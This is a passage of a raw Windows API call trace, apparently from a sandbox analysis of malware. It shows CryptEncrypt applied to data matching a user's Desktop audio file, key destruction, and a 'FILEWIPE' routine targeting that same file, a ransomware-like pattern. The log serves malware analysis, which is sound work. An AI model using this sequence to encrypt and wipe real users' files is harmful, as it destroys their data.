lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.660] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.661] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x10f89, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x10f90) returned 1 [0161.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.662] CharLowerBuffW (in: lpsz="byte[69521]", cchLength=0xb | out: lpsz="byte[69521]") returned 0xb [0161.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.663] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.663] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9f8048*, pdwDataLen=0x87e820*=0x10f89, dwBufLen=0x10f90 | out: pbData=0x9f8048*, pdwDataLen=0x87e820*=0x10f90) returned 1 [0161.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.663] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.663] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.664] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.664] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.664] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.664] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.664] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.664] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.664] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.668] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.668] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.668] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.673] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0161.673] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.673] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0161.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.673] CryptDestroyKey (hKey=0x90af18) returned 1 [0161.675] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.675] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.675] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.675] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.676] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.676] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.676] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.676] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.676] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.676] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.676] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.676] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.676] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.676] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.677] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0161.677] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.677] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.677] FreeLibrary (hLibModule=0x74f20000) returned 1 [0161.677] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.677] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.677] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.677] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.678] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.681] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.681] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0161.681] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.682] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d25ab0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0xbb9f920, ftLastAccessTime.dwHighDateTime=0x1d5d7fe, ftLastWriteTime.dwLowDateTime=0xbb9f920, ftLastWriteTime.dwHighDateTime=0x1d5d7fe, nFileSizeHigh=0x0, nFileSizeLow=0x10f89, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gx8HB3O7amX5sO9SwzMc.wav", cAlternateFileName="GX8HB3~1.WAV")) returned 0x90ae18 [0161.682] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.682] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.682] CharLowerBuffW (in: lpsz="byte[69513]", cchLength=0xb | out: lpsz="byte[69513]") returned 0xb [0161.683] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.683] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0161.683] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.683] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0161.683] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0161.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0161.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2898 [0161.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0161.683] FreeLibrary (hLibModule=0x75c90000) returned 1 [0161.684] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.684] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.684] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0161.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.686] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.686] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.686] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.686] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0161.686] RtlAllocateHeap 